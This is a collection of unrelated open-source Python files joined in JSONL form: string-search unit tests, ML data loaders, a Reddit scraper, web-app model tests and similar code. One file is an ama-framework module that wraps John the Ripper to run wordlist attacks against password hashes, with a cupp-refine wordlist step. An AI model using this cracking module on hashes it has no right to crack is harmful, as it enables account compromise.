matched=b('def'))],\n )\n\n self.expectedOutcomes(\n self.search(b('def'), b('abcddefg'), max_subs=2),\n [Match(start=3, end=6, dist=2, matched=b('dde')),\n Match(start=4, end=7, dist=0, matched=b('def'))],\n )\n\n def test_two_identical(self):\n self.expectedOutcomes(\n self.search(b('abc'), b('abcabc'), max_subs=1),\n [Match(start=0, end=3, dist=0, matched=b('abc')),\n Match(start=3, end=6, dist=0, matched=b('abc'))],\n )\n\n self.expectedOutcomes(\n self.search(b('abc'), b('abcXabc'), max_subs=1),\n [Match(start=0, end=3, dist=0, matched=b('abc')),\n Match(start=4, end=7, dist=0, matched=b('abc'))],\n )\n\n def test_one_changed_in_middle(self):\n substring = b('abcdefg')\n pattern = b('abcXefg')\n expected_match = Match(start=0, end=7, dist=1, matched=pattern)\n\n self.expectedOutcomes(\n self.search(substring, pattern, max_subs=0),\n [],\n )\n\n self.expectedOutcomes(\n self.search(substring, pattern, max_subs=1),\n [expected_match],\n )\n\n self.expectedOutcomes(\n self.search(substring, pattern, max_subs=2),\n [expected_match],\n )\n\n def test_one_missing_in_middle(self):\n substring = b('PATTERN')\n text = b('aaaaaaaaaaPATERNaaaaaaaaa')\n\n for max_subs in [0, 1, 2]:\n self.expectedOutcomes(\n self.search(substring, text, max_subs=max_subs),\n [],\n )\n\n def test_one_changed_in_middle2(self):\n substring = b('PATTERN')\n text = b('aaaaaaaaaaPATtERNaaaaaaaaa')\n expected_match = Match(start=10, end=17, dist=1, matched=b('PATtERN'))\n\n self.expectedOutcomes(\n self.search(substring, text, max_subs=0),\n [],\n )\n self.expectedOutcomes(\n self.search(substring, text, max_subs=1),\n [expected_match],\n )\n self.expectedOutcomes(\n self.search(substring, text, max_subs=2),\n [expected_match],\n )\n\n def test_one_extra_in_middle(self):\n substring = b('PATTERN')\n text = b('aaaaaaaaaaPATTXERNaaaaaaaaa')\n\n for max_subs in [0, 1, 2]:\n self.expectedOutcomes(\n self.search(substring, text, max_subs=max_subs),\n [],\n )\n\n def test_all_different(self):\n substring = b('AAAA')\n text = b('ZZZZ')\n\n for max_subs in [0, 1, 2, 3]:\n self.expectedOutcomes(\n self.search(substring, text, max_subs=max_subs),\n [],\n )\n\n for max_subs in [4, 5]:\n self.expectedOutcomes(\n self.search(substring, text, max_subs=max_subs),\n [Match(start=0, end=4, dist=4, matched=b('ZZZZ'))],\n )\n\n def test_dna_search(self):\n # see: http://stackoverflow.com/questions/19725127/\n text = b(''.join('''\\\n GACTAGCACTGTAGGGATAACAATTTCACACAGGTGGACAATTACATTGAAAATCACAGATTGGT\n CACACACACATTGGACATACATAGAAACACACACACATACATTAGATACGAACATAGAAACACAC\n ATTAGACGCGTACATAGACACAAACACATTGACAGGCAGTTCAGATGATGACGCCCGACTGATAC\n TCGCGTAGTCGTGGGAGGCAAGGCACACAGGGGATAGG\n '''.split()))\n pattern = b('TGCACTGTAGGGATAACAAT')\n\n self.expectedOutcomes(\n self.search(pattern, text, max_subs=2),\n [Match(start=4, end=24, dist=1, matched=text[4:24])],\n )\n\n def test_protein_search1(self):\n # see:\n # * BioPython archives from March 14th, 2014\n # http://lists.open-bio.org/pipermail/biopython/2014-March/009030.html\n # * https://github.com/taleinat/fuzzysearch/issues/3\n text = b(''.join('''\\\n XXXXXXXXXXXXXXXXXXXGGGTTVTTSSAAAAAAAAAAAAAGGGTTLTTSSAAAAAAAAAAAA\n AAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBGGGTTLTTSS\n '''.split()))\n pattern = b(\"GGGTTLTTSS\")\n\n self.expectedOutcomes(\n self.search(pattern, text, max_subs=0),\n [Match(start=42, end=52, dist=0, matched=text[42:52]),\n Match(start=99, end=109, dist=0, matched=text[99:109])],\n )\n\n self.expectedOutcomes(\n self.search(pattern, text, max_subs=1),\n [Match(start=19, end=29, dist=1, matched=text[19:29]),\n Match(start=42, end=52, dist=0, matched=text[42:52]),\n Match(start=99, end=109, dist=0, matched=text[99:109])],\n )\n\n self.expectedOutcomes(\n self.search(pattern, text, max_subs=2),\n [Match(start=19, end=29, dist=1, matched=text[19:29]),\n Match(start=42, end=52, dist=0, matched=text[42:52]),\n Match(start=99, end=109, dist=0, matched=text[99:109])],\n )\n\n def test_protein_search2(self):\n # see:\n # * BioPython archives from March 14th, 2014\n # http://lists.open-bio.org/pipermail/biopython/2014-March/009030.html\n # * https://github.com/taleinat/fuzzysearch/issues/3\n text = b(''.join('''\\\n XXXXXXXXXXXXXXXXXXXGGGTTVTTSSAAAAAAAAAAAAAGGGTTVTTSSAAAAAAAAAAA\n AAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBGGGTTLTTSS\n '''.split()))\n pattern = b(\"GGGTTLTTSS\")\n\n self.expectedOutcomes(\n self.search(pattern, text, max_subs=0),\n [Match(start=99, end=109, dist=0, matched=text[99:109])],\n )\n\n self.expectedOutcomes(\n self.search(pattern, text, max_subs=1),\n [Match(start=19, end=29, dist=1, matched=text[19:29]),\n Match(start=42, end=52, dist=1, matched=text[42:52]),\n Match(start=99, end=109, dist=0, matched=text[99:109])],\n )\n\n self.expectedOutcomes(\n self.search(pattern, text, max_subs=2),\n [Match(start=19, end=29, dist=1, matched=text[19:29]),\n Match(start=42, end=52, dist=1, matched=text[42:52]),\n Match(start=99, end=109, dist=0, matched=text[99:109])],\n )\n\n def test_missing_at_beginning(self):\n self.expectedOutcomes(\n self.search(b(\"ATTEST\"), b(\"TESTOSTERONE\"), max_subs=2),\n [],\n )\n\n def test_unicode_substring(self):\n pattern = u('\\u03A3\\u0393')\n text = u('\\u03A0\\u03A3\\u0393\\u0394')\n self.expectedOutcomes(\n self.search(pattern, text, max_subs=0),\n [Match(1, 3, 0, matched=text[1:3])]\n )\n\n def test_max_substitutions_gte_subseq_len(self):\n for max_subs in [1, 2, 5]:\n self.expectedOutcomes(\n self.search(b('b'), b('abc'), max_subs),\n [Match(0, 1, 1, b('a')),\n Match(1, 2, 0, b('b')),\n Match(2, 3, 1, b('c'))]\n )\n for extra_subs in [0, 1, 7]:\n self.expectedOutcomes(\n self.search(b('PATTERN'), b('PATTERN'), len('PATTERN') + extra_subs),\n [Match(0, len('PATTERN'), 0, b('PATTERN'))]\n )\n\n\nclass TestFindNearMatchesSubstitions(TestSubstitionsOnlyBase,\n unittest.TestCase):\n def search(self, subsequence, sequence, max_subs):\n return fnm_subs(subsequence, sequence, max_subs)\n\n def expectedOutcomes(self, search_results, expected_outcomes, *args, **kwargs):\n best_from_grouped_results = [\n get_best_match_in_group(group)\n for group in group_matches(search_results)\n ]\n best_from_grouped_exepected_outcomes = [\n get_best_match_in_group(group)\n for group in group_matches(expected_outcomes)\n ]\n return self.assertEqual(best_from_grouped_results,\n best_from_grouped_exepected_outcomes,\n *args, **kwargs)\n\n\nclass TestFindNearMatchesSubstitionsLinearProgramming(TestSubstitionsOnlyBase,\n unittest.TestCase):\n def search(self, subsequence, sequence, max_subs):\n return list(fnm_subs_lp(subsequence, sequence, max_subs))\n\n def expectedOutcomes(self, search_results, expected_outcomes, *args, **kwargs):\n return self.assertEqual(search_results, expected_outcomes, *args, **kwargs)\n\n\nclass TestFindNearMatchesSubstitionsNgrams(TestSubstitionsOnlyBase,\n unittest.TestCase):\n def search(self, subsequence, sequence, max_subs):\n if max_subs >= len(subsequence):\n self.skipTest(\"avoiding calling fnm_subs_ngrams() \" +\n \"with max_subs >= len(subsequence)\")\n return fnm_subs_ngrams(subsequence, sequence, max_subs)\n\n def expectedOutcomes(self, search_results, expected_outcomes, *args, **kwargs):\n return self.assertEqual(\n consolidate_overlapping_matches(search_results),\n consolidate_overlapping_matches(expected_outcomes),\n *args, **kwargs)\n\n\nclass TestHasNearMatchSubstitionsOnlyBase(TestSubstitionsOnlyBase):\n def search(self, subsequence, sequence, max_subs):\n raise NotImplementedError\n\n def expectedOutcomes(self, search_results, expected_outcomes, *args, **kwargs):\n return self.assertEqual(bool(search_results),\n bool(expected_outcomes),\n *args, **kwargs)\n\n\nclass TestHasNearMatchSubstitionsOnly(TestHasNearMatchSubstitionsOnlyBase,\n unittest.TestCase):\n def search(self, subsequence, sequence, max_subs):\n return hnm_subs(subsequence, sequence, max_subs)\n\n\nclass TestHasNearMatchSubstitionsOnlyNgrams(TestHasNearMatchSubstitionsOnlyBase,\n unittest.TestCase):\n def search(self, subsequence, sequence, max_subs):\n if max_subs >= len(subsequence):\n self.skipTest(\"avoiding calling hnm_subs_ngrams() \" +\n \"with max_subs >= len(subsequence)\")\n return hnm_subs_ngrams(subsequence, sequence, max_subs)\n\n\nclass TestHasNearMatchSubstitionsOnlyLp(TestHasNearMatchSubstitionsOnlyBase,\n unittest.TestCase):\n def search(self, subsequence, sequence, max_subs):\n return hnm_subs_lp(subsequence, sequence, max_subs)\n\n\ntry:\n from fuzzysearch._substitutions_only import \\\n substitutions_only_has_near_matches_lp_byteslike as \\\n hnm_subs_lp_byteslike, \\\n substitutions_only_find_near_matches_lp_byteslike as \\\n fnm_subs_lp_byteslike, \\\n substitutions_only_has_near_matches_ngrams_byteslike as \\\n hnm_subs_ngrams_byteslike, \\\n substitutions_only_find_near_matches_ngrams_byteslike as \\\n fnm_subs_ngrams_byteslike\nexcept ImportError:\n pass\nelse:\n class TestHasNearMatchesSubstitionsLpByteslike(\n TestHasNearMatchSubstitionsOnlyBase,\n unittest.TestCase\n ):\n @skip_if_arguments_arent_byteslike\n def search(self, subsequence, sequence, max_subs):\n return hnm_subs_lp_byteslike(subsequence, sequence,\n max_subs)\n\n class TestHasNearMatchesSubstitionsNgramsByteslike(\n TestHasNearMatchSubstitionsOnlyBase,\n unittest.TestCase\n ):\n @skip_if_arguments_arent_byteslike\n def search(self, subsequence, sequence, max_subs):\n if max_subs >= len(subsequence):\n self.skipTest(\"avoiding calling hnm_subs_ngrams_byteslike() \" +\n \"with max_subs >= len(subsequence)\")\n return hnm_subs_ngrams_byteslike(subsequence, sequence,\n max_subs)\n\n class TestFindNearMatchesSubstitionsLpByteslike(\n TestSubstitionsOnlyBase,\n unittest.TestCase\n ):\n @skip_if_arguments_arent_byteslike\n def search(self, subsequence, sequence, max_subs):\n results = fnm_subs_lp_byteslike(subsequence, sequence,\n max_subs)\n matches = [\n Match(\n index,\n index + len(subsequence),\n count_differences_with_maximum(\n sequence[index:index+len(subsequence)],\n subsequence,\n max_subs + 1,\n ),\n matched=sequence[index:index+len(subsequence)]\n )\n for index in results\n ]\n return matches\n\n def expectedOutcomes(self, search_results, expected_outcomes,\n *args, **kwargs):\n return self.assertEqual(search_results, expected_outcomes,\n *args, **kwargs)\n\n class TestFindNearMatchesSubstitionsNgramsByteslike(\n TestSubstitionsOnlyBase,\n unittest.TestCase\n ):\n @skip_if_arguments_arent_byteslike\n def search(self, subsequence, sequence, max_subs):\n results = fnm_subs_ngrams_byteslike(subsequence, sequence,\n max_subs)\n matches = [\n Match(\n index,\n index + len(subsequence),\n count_differences_with_maximum(\n sequence[index:index+len(subsequence)],\n subsequence,\n max_subs + 1,\n ),\n matched=sequence[index:index+len(subsequence)]\n )\n for index in results\n ]\n return [\n get_best_match_in_group(group)\n for group in group_matches(matches)\n ]\n\n def expectedOutcomes(self, search_results, expected_outcomes, *args, **kwargs):\n return self.assertEqual(\n consolidate_overlapping_matches(search_results),\n consolidate_overlapping_matches(expected_outcomes),\n *args, **kwargs)\n","repo_name":"taleinat/fuzzysearch","sub_path":"tests/test_substitutions_only.py","file_name":"test_substitutions_only.py","file_ext":"py","file_size_in_byte":16224,"program_lang":"python","lang":"en","doc_type":"code","stars":262,"dataset":"github-code","pt":"92"} +{"seq_id":"25515139273","text":"__author__ = 'GastonLucero'\r\n\r\nfrom clases.Reader import Reader\r\n\r\n\r\ndef main():\r\n try:\r\n file_name = 'data.json'\r\n file_path = Reader.get_data_file_path(file_name)\r\n Reader.load_json_from_file(file_path)\r\n print('Valid Json file.')\r\n return 1\r\n\r\n except Exception as e:\r\n print('INVALID Json file.')\r\n return 0\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"sanmope/btcviewer","sub_path":"run_validate_file.py","file_name":"run_validate_file.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"8170611240","text":"from logical.models import Database\nfrom system.models import Configuration\nfrom datetime import date, timedelta\nfrom dbaas.celery import app\nfrom util.decorators import only_one\nfrom simple_audit.models import AuditRequest\nfrom notification.models import TaskHistory\nfrom account.models import AccountUser\nimport logging\n\nLOG = logging.getLogger(__name__)\n\n\n@app.task(bind=True)\n@only_one(key=\"purgequarantinekey\", timeout=1000)\ndef purge_quarantine(self,):\n user = AccountUser.objects.get(username='admin')\n AuditRequest.new_request(\"purge_quarantine\", user, \"localhost\")\n\n try:\n task_history = TaskHistory.register(request=self.request, user=user)\n task_history.relevance = TaskHistory.RELEVANCE_WARNING\n\n LOG.info(\n \"id: {} | task: {} | kwargs: {} | args: {}\".format(\n self.request.id, self.request.task,\n self.request.kwargs, str(self.request.args)\n )\n )\n\n quarantine_time = Configuration.get_by_name_as_int(\n 'quarantine_retention_days'\n )\n quarantine_time_dt = date.today() - timedelta(days=quarantine_time)\n task_history.add_detail(\n \"Quarantine date older than {}\".format(quarantine_time_dt)\n )\n\n databases = Database.objects.filter(\n is_in_quarantine=True, quarantine_dt__lte=quarantine_time_dt\n )\n task_history.add_detail(\n \"Databases to purge: {}\".format(len(databases))\n )\n\n for database in databases:\n task_history.add_detail('Deleting {}...'.format(database), level=2)\n database.destroy(user)\n\n task_history.update_status_for(\n TaskHistory.STATUS_SUCCESS,\n details='Listed databases were destroyed successfully.'\n )\n return\n\n except Exception as e:\n task_history.update_status_for(\n TaskHistory.STATUS_ERROR, details=\"Error\\n{}\".format(e))\n return\n finally:\n AuditRequest.cleanup_request()\n","repo_name":"globocom/database-as-a-service","sub_path":"dbaas/logical/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":356,"dataset":"github-code","pt":"92"} +{"seq_id":"1895492052","text":"import torch\nfrom torch.utils.data import Dataset\nimport torch.nn as nn\nimport numpy as np\nimport pandas as pd\nfrom torchvision import datasets, models\nimport torchvision.transforms as transforms\nimport os\nimport torch.nn as nn\nimport matplotlib.image as img\nfrom sklearn.model_selection import train_test_split\nfrom torch.utils.data import DataLoader\n\n\nmeans = np.array([0.485, 0.456, 0.406])\nstd = np.array([0.229, 0.224, 0.225])\n\ntrans = transforms.Compose([transforms.ToPILImage(),\n transforms.ToTensor(),\n transforms.Normalize(means, std),\n transforms.Resize([150, 150]),\n transforms.RandomRotation(90)])\npr_trans = transforms.Compose([transforms.ToPILImage(),\n transforms.ToTensor(),\n transforms.Normalize(means, std),\n transforms.Resize([150, 150])])\n\ndef train_info_load(path):\n images = []\n labels = []\n cr_dir = os.getcwd()\n for dirname, _, filenames in os.walk(os.path.join(cr_dir, path)):\n for filename in filenames:\n images.append(filename)\n if filename.find('all') != -1:\n labels.append(1)\n elif filename.find('hem') != -1:\n labels.append(0)\n\n info = pd.DataFrame({'images': images, 'labels': labels})\n return info\n\n\ndef test_info_load(path, filename):\n cr_dir = os.getcwd()\n info = pd.read_csv(os.path.join(cr_dir, path, filename))\n info = info.drop('Patient_ID', axis=1)\n info.columns = ['images', 'labels']\n return info\n\n\nclass AllDataset(Dataset):\n def __init__(self, data, path, transform=None):\n super().__init__()\n self.data = data.values\n self.path = path\n self.transform = transform\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_name, label = self.data[index]\n img_path = os.path.join(self.path, img_name)\n image = img.imread(img_path)\n if self.transform is not None:\n image = self.transform(image)\n return image, label\n\n\ndef dataset_prepare(train_info, test_info, train_path, test_path):\n train, valid = train_test_split(train_info, stratify=train_info.labels, test_size=0.33)\n train_data = AllDataset(train, train_path, trans)\n valid_data = AllDataset(valid, train_path, trans)\n test_data = AllDataset(test_info, test_path, trans)\n return train_data, valid_data, test_data\n\n\nclass Predicted(Dataset):\n def __init__(self, path, transform=None):\n super().__init__()\n self.path = path\n self.transform = transform\n\n def __len__(self):\n return 1\n\n def __getitem__(self, index):\n img_path= self.path\n image = img.imread(img_path)\n if self.transform is not None:\n image = self.transform(image)\n return image\n\n\ndef prediction_data(image):\n return DataLoader(dataset=Predicted(image, pr_trans), batch_size=1)\n","repo_name":"Rumotameru/NNet","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"4083002740","text":"import random\n\nimport matplotlib.pyplot as plt\n\nfrom lib.machine_learning import knn\nfrom lib.stat import randstat\n\n\n# Zip to list of lists\ndef listzip(x, y):\n return [list(it) for it in zip(x, y)]\n\nrandstat.init()\nN_POINT = 100\nCOLORS = ['red', 'green']\n\nx = [random.uniform(-1, 1) for i in range(0, N_POINT)]\ny = [random.uniform(-1, 1) for i in range(0, N_POINT)]\nt = [COLORS[random.randint(0,1)] for i in range(0, N_POINT)]\nvList = listzip(x,y)\np = [0.5, 0.3]\n\nknn.knn(vList, t, p, 1)\nknn.knn(vList, t, p, 2)\nknn.knn(vList, t, p, 3)\nknn.knn(vList, t, p, 4)\nknn.knn(vList, t, p, 5)\nknn.maxEField(vList, t, p)\n\nplt.scatter(x,y, color=t)\nplt.show()\n\n","repo_name":"aleksejs-fomins/snippets-data-analysis","sub_path":"inference-parametric/machine_learning/UnsupervisedLearning/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"16068343561","text":"\nimport os\nimport os.path as path\nimport calendar\nimport json\nimport time\nimport math\nimport signal\n\nstop_loops = False\n\ndef sigint_handler(signum, frame):\n\tstops_loops = True\nsignal.signal(signal.SIGINT, sigint_handler)\n\ndef findTotalLoopsRequired(startTime, endTime, num_days_per_loop):\n\tdiff = endTime - startTime\n\treturn math.ceil(diff / getDaysInSeconds(num_days_per_loop))\n\ndef addComments(reddit, posts, output, filename):\n\t\"\"\"\n\tGo through each postId in the posts and get an array of comments\n\tfor this post.\n\t\"\"\"\n\n\tprint('\\n Now adding comments to ' + filename)\n\tnum_posts = len(posts.keys())\n\n\tfor idx, postId in enumerate(posts.keys()):\n\t\tif (stop_loops):\n\t\t\tprint('exiting')\n\t\t\twriteToFile(posts, output)\n\t\t\toutput.close()\n\t\t\tbreak\n\n\t\tprint('On post {0} out of {1}.'.format(idx+1, num_posts))\n\t\tif (posts[postId]['comments'] and len(posts[postId]['comments']) > 0):\n\t\t\tprint('Skipping this post, already done')\n\t\t\tcontinue\n\n\t\tsubmission = reddit.submission(id=postId)\n\t\tsubmission.comments.replace_more(limit=None)\n\t\tall_comments = submission.comments.list()\n\n\t\tall_comments_text = []\n\t\tfor comment in all_comments:\n\t\t\tall_comments_text.append(comment.body)\n\t\tposts[postId]['comments'] = all_comments_text\n\n\t\tprint('Added comments to this post, sleeping now')\n\t\ttime.sleep(2)\n\n\t\tif (idx > 0 and idx % 5 == 0):\n\t\t\tprint('Writing to file')\n\t\t\twriteToFile(posts, output)\n\n\twriteToFile(posts, output)\n\ndef addPosts(subreddit, startTime, endTime, posts, output, filename, num_days=2):\n\t\"\"\"\n\tAdd all of the posts between the startTime and endTime\n\tReturns the posts dictionary with all of the posts\n\t\"\"\"\n\n\tprint('Now adding posts to ' + filename)\n\n\tstartTimeLoop = getLatestPostEntry(posts, startTime)\n\tendTimeLoop = min([startTimeLoop + getDaysInSeconds(num_days), endTime])\n\tloopNum = 1\n\ttotal_loops_required = findTotalLoopsRequired(startTimeLoop, endTime, num_days)\n\n\twhile(startTimeLoop < endTime):\n\t\tif (stop_loops):\n\t\t\tprint('exiting')\n\t\t\twriteToFile(posts, output)\n\t\t\toutput.close()\n\t\tprint('On loop {0} out of {1} in adding posts'.format(loopNum, total_loops_required))\n\t\ttry:\n\t\t\tfor submission in subreddit.submissions(startTimeLoop, endTimeLoop):\n\t\t\t\tposts[submission.id] = {}\n\t\t\t\tposts[submission.id]['created'] = submission.created\n\t\t\t\tposts[submission.id]['comments'] = []\n\t\t\twriteToFile(posts, output)\n\t\t\tstartTimeLoop = endTimeLoop\n\t\t\tendTimeLoop = min([endTimeLoop + getDaysInSeconds(num_days), endTime])\n\t\t\tloopNum += 1\n\t\texcept Exception as error:\n\t\t\tprint('Recieved an error, trying again next loop')\n\n\n\t# return the final posts dict in case this is needed\n\treturn posts\n\n\ndef createFolder(foldername):\n\t\"\"\"\n\tWill create this folder if it does not exist at the moment\n\t\"\"\"\n\tif (path.exists(foldername)):\n\t\treturn\n\ttry:\n\t\tos.makedirs(foldername)\n\texcept OSError as err: \n\t\tif err.errno != errno.EEXIST:\n\t\t\traise\n\ndef getDaysInSeconds(days):\n\treturn 60 * 60 * 24 * days\n\ndef getFileContent(filename):\n\tcontent = None\n\tif path.exists(filename):\n\t\tf = open(filename, 'r', encoding='utf-8')\n\t\tcontent = f.read()\n\t\tf.close()\n\treturn content\n\ndef getLatestPostEntry(posts, startTime):\n\t\"\"\"\n\tWill find the latest timestamp given a dictionary of posts\n\tEnsure that the posts dictionary exists\n\t\"\"\"\n\tif (posts is None or len(posts.keys()) == 0):\n\t\treturn None\n\n\tlatestCreatedTime = startTime\n\tfor postId in posts.keys():\n\t\tcreatedTime = posts[postId]['created']\n\t\tif (createdTime > latestCreatedTime):\n\t\t\tlatestCreatedTime = createdTime\n\n\treturn latestCreatedTime\n\ndef writeToFile(posts, fp):\n\tfp.seek(0) # write to beginning\n\tjson.dump(posts, fp)\n\ndef scrape(subreddit, startTime, reddit, endTime=None, filename=None, foldername=None, quiet=1):\n\t\"\"\"\n\tMain scrape function, get all posts first, do so one week at\n\ta time. At the start of each iteration go from the first one that\n\thas no comment values, in case the last iteration failed.\n\tThen go through one post every 2 seconds\n\t\"\"\"\n\n\t# set filename if not provided\n\tif (filename is None):\n\t\tfilename = subreddit + '_comments'\n\tfilename += '.json'\n\n\t# set endTime to current if not provided\n\tif (endTime is None):\n\t\tendTime = calendar.timegm(time.gmtime())\n\n\t# set foldername options is exists\n\tif (foldername):\n\t\tfilename = foldername + '/' + filename\n\t\tcreateFolder(foldername)\n\n\t# get all the post comments if any exist at the moment\n\tposts_str = getFileContent(filename)\n\tposts = {}\n\tif (posts_str is not None and len(posts_str) > 0):\n\t\tposts = json.loads(posts_str)\n\n\t# out file for writing\n\toutput = None\n\tif (path.exists(filename)):\n\t\toutput = open(filename, 'r+', encoding='utf-8') # don't destroy file\n\telse:\n\t\toutput = open(filename, 'w', encoding='utf-8')\n\n\t# subreddit instance\n\tsubreddit = reddit.subreddit(subreddit)\n\n\t# add all of the posts to the file\n\taddPosts(subreddit, startTime, endTime, posts, output, filename)\n\tprint('Added all posts')\n\n\t# add comments now that we've added all possible posts\n\taddComments(reddit, posts, output, filename)\n\tprint('Added all comments')\n\n\t# close the output file\n\toutput.close()","repo_name":"djamrozik/datalok_projects","sub_path":"subreddit_book_recommender/subreddit_all_comments.py","file_name":"subreddit_all_comments.py","file_ext":"py","file_size_in_byte":5003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"40562899830","text":"import streamlit as st\nfrom modeling_dl import serve_model_dl\nfrom modeling_non_dl import serve_model_non_dl\n\n\ndef process_sentence(input_sentence):\n dl = serve_model_dl(model_path='models/model-dl.pth', vocab_path='models/vocab.pkl', sentence=input_sentence)\n nondl = serve_model_non_dl(model_path='models/model-lr.pkl', vec_path='models/vec.pkl', sentence=input_sentence)\n return dl, nondl\n\n\ndef main():\n st.title(\"Sentence Processor\")\n input_sentence = st.text_input(\"Enter a sentence:\")\n\n if st.button(\"Predict\"):\n if input_sentence:\n dl, nondl = process_sentence(input_sentence)\n st.write(f'results from deep learning model: {dl}')\n st.write(f'results from non deep learning model: {nondl}')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"yiboliu/AIPI540-NLP","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"33931619435","text":"#!/usr/bin/env python3\n#\n# wordlist attack using john with cupp-refine as pre attack module\n#\n# date: Mar 30 2021\n# Maintainer: glozanoa <glozanoa@uni.pe>\n\nfrom typing import Any\n\nfrom ..john_wordlist import JohnWordlist\nfrom ama.core.modules.auxiliary.wordlists import CuppRefine\n\n# cracker imports\nfrom ama.core.plugins.cracker import John\n\n# slurm import\nfrom ama.core.slurm import Slurm\n\n#fineprint status\nfrom fineprint.status import (\n print_failure,\n print_status\n)\n\n\n# name format: PREATTACK_ATTACK_POSTATTACK\n# (if pre/post attack is null then _ replace its name)\nclass CuppRefine_JohnWordlist__(JohnWordlist):\n def __init__(self, init_options = None):\n\n if init_options is None:\n init_options = {\n \"pre_attack\": CuppRefine(),\n \"post_attack\": None\n }\n\n super().__init__(**init_options)\n self.options['wordlist'].required = False\n self.fulldescription = (\n \"\"\"\n Perform wordlists attacks against hashes\n with john using the refine wordlist generated by cupp-refine,\n also this parallel task can be submited in a cluster using Slurm\n \"\"\"\n )\n\n # pre attack options\n # if self.selected_pre_attack:\n # self.selected_pre_attack.options['wordlist'].value = self.options['wordlist'].value\n\n # preattack output format: {hash: [POSIBLE_IDENTITIES, ...], ...}\n def attack(self, local:bool = False, force: bool = False, pre_attack_output: Any = None):\n \"\"\"\n Wordlist attack using John the Ripper with cupp-interactive as pre attack module\n\n Args:\n local (bool): if local is True run attack localy otherwise\n submiting parallel tasks in a cluster using slurm\n \"\"\"\n #import pdb; pdb.set_trace()\n try:\n if not force:\n self.no_empty_required_options(local)\n\n jtr = John()\n\n refined_wordlist = pre_attack_output\n hash_types = self.options['hash_type'].value.split(',')\n jtr.wordlist_attack(hash_types = hash_types,\n hashes_file = self.options['hashes_file'].value,\n wordlist = refined_wordlist,\n slurm = self.slurm,\n local = local)\n\n except Exception as error:\n print_failure(error)\n\n def setv(self, option, value, *, pre_attack: bool = False, post_attack: bool = False):\n #import pdb; pdb.set_trace()\n super().setv(option, value, pre_attack = pre_attack, post_attack = post_attack)\n\n option = option.lower()\n # attack -> pre atack\n if option == \"wordlist\":\n if self.selected_pre_attack and not (pre_attack or post_attack): # and \\\n #self.options['wordlist'].value is not None:\n self.selected_pre_attack.options['wordlist'].value = self.options['wordlist'].value\n\n # pre atack -> attack\n if option == \"wordlist\":\n if self.selected_pre_attack and pre_attack: # and \\\n #self.selected_pre_attack.options['wordlist'].value:\n self.options['wordlist'].value = self.selected_pre_attack.options['wordlist'].value\n","repo_name":"abjoschevaro/ama-framework","sub_path":"ama/core/modules/attack/hashes/fullattacks/cuppRefine_johnWordlist__.py","file_name":"cuppRefine_johnWordlist__.py","file_ext":"py","file_size_in_byte":3300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"44039560741","text":"\"\"\"User model tests.\"\"\"\n\n# run these tests like:\n#\n# python -m unittest test_user_model.py\n\n\nimport os\nfrom unittest import TestCase\n# from sqlalchemy import exc\n\nfrom models import db, User, Message, Follows, Likes\n\n# BEFORE we import our app, let's set an environmental variable\n# to use a different database for tests (we need to do this\n# before we import our app, since that will have already\n# connected to the database\n\nos.environ['DATABASE_URL'] = \"postgresql:///warbler-test\"\n\n\n# Now we can import app\n\nfrom app import app\n\n# Create our tables (we do this here, so we only create the tables\n# once for all tests --- in each test, we'll delete the data\n# and create fresh new clean test data\n\ndb.create_all()\n\n\nclass MessageModelTestCase(TestCase):\n \"\"\"Test views for messages.\"\"\"\n\n def setUp(self):\n \"\"\"Create test client, add sample data.\"\"\"\n\n db.drop_all()\n db.create_all()\n\n u1 = User.signup(\"testuser1\", \"test1@test.com\", \"HASHED_PASSWORD\", None)\n u1id = 1\n u1.id =u1id\n\n m1 = Message(text='hi, this is a test', user_id=u1id)\n m1id = 1\n m1.id = m1id\n\n db.session.add(m1)\n db.session.commit()\n\n m1 = Message.query.get(m1id)\n u1 = User.query.get(u1id)\n\n self.m1 = m1\n self.m1id = m1id\n self.u1 = u1\n self.u1id = u1id\n\n self.client = app.test_client()\n\n def tearDown(self):\n res = super().tearDown()\n db.session.rollback()\n return res\n\n def test_user_model(self):\n \"\"\"Does basic model work?\"\"\"\n\n m = Message(\n text=\"Does basic model work?\",\n user_id=1\n )\n m.id = 2\n\n db.session.add(m)\n db.session.commit()\n\n self.assertIsNotNone(m)\n self.assertEqual(m.user.id, 1)\n self.assertEqual(len(self.u1.messages), 2)\n self.assertEqual(self.u1.messages[1].text, \"Does basic model work?\")\n\n\n def test_message_likes(self):\n \"\"\"Does liking a message work?\"\"\"\n\n u2 = User.signup(\"like_user\", \"like@email.com\", \"password\", None)\n u2id = 2\n u2.id = u2id\n db.session.add_all([u2])\n db.session.commit()\n\n u2.likes.append(self.m1)\n\n db.session.commit()\n\n l = Likes.query.filter(Likes.user_id == u2id).all()\n self.assertEqual(len(l), 1)\n self.assertEqual(l[0].message_id, self.m1.id)\n","repo_name":"jimmy5227/26-Twitter-Clone","sub_path":"test_message_model.py","file_name":"test_message_model.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"40561503725","text":"import pytest\n\nimport test_tools as tt\nfrom hive_local_tools import run_for\n\n@pytest.mark.parametrize(\n 'ask_hbd_amount, ask_hive_amount, bid_hbd_amount, bid_hive_amount', (\n (50, 300, 30, 200),\n (25, 250, 20, 300)\n 